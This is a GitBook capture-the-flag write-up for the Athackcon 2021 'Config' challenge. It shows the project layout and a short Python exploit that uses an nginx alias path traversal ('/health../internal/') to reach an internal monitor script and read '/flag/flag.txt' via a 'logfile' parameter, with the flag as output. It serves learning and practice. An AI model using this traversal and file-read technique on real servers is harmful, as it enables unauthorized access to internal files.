Diefunction
  • About
  • Vulnerabilities
    • GHSL-2021-023 / CVE-2021-32819
  • CTF
    • Technology Control Company
      • Athackcon CTF 2021
        • Trust
        • Config
        • Extend
        • Poison
      • Blackhat MEA 2022
        • CTF Setup on Kali linux
        • Careers
        • SOC Complaints
    • Athackcon
      • POLL
    • Cyber Night 3
      • Client Hell
    • BlackHatMEA Quals 2022
      • Spatify
      • PeehPee
      • Meme generator
      • Black notes
      • Jimmy's blog
    • BlackHatMEA Quals 2023
      • Web - Hardy
      • Web - Authy
      • Reverse engineering - light up the server
    • BITSCTF - Reverse Mishap
Powered by GitBook
On this page
  • Project
  • Solution

Was this helpful?

  1. CTF
  2. Technology Control Company
  3. Athackcon CTF 2021

Config

Project

Structure

config
├── health-app/ 
│   ├── external/ 
│       └── index.php 
│   ├── flag/ 
│       └── flag.txt
│   ├── internal/ 
│       ├── index.php 
│       └── monitor.php
│   └── Dockerfile 
└── nginx-proxy/ 
    ├── Dockerfile
    └── nginx.conf

Solution

Install pip

sudo apt install python3-pip

Install requests

python3 -m pip install requests

Exploit

from requests import post

host = '127.0.0.1'
port = '8001'

payload = {
    'logfile': '/flag/flag.txt'
}
flag = post(f'http://{host}:{port}/health../internal/monitor.php', data = payload).text
print(flag)

Run the script

python3 exploit.py

Output

TCC{n91NX_rpR0xY_M15C0nF19Ur4t10n}<br>
PreviousTrustNextExtend

Last updated 3 years ago

Was this helpful?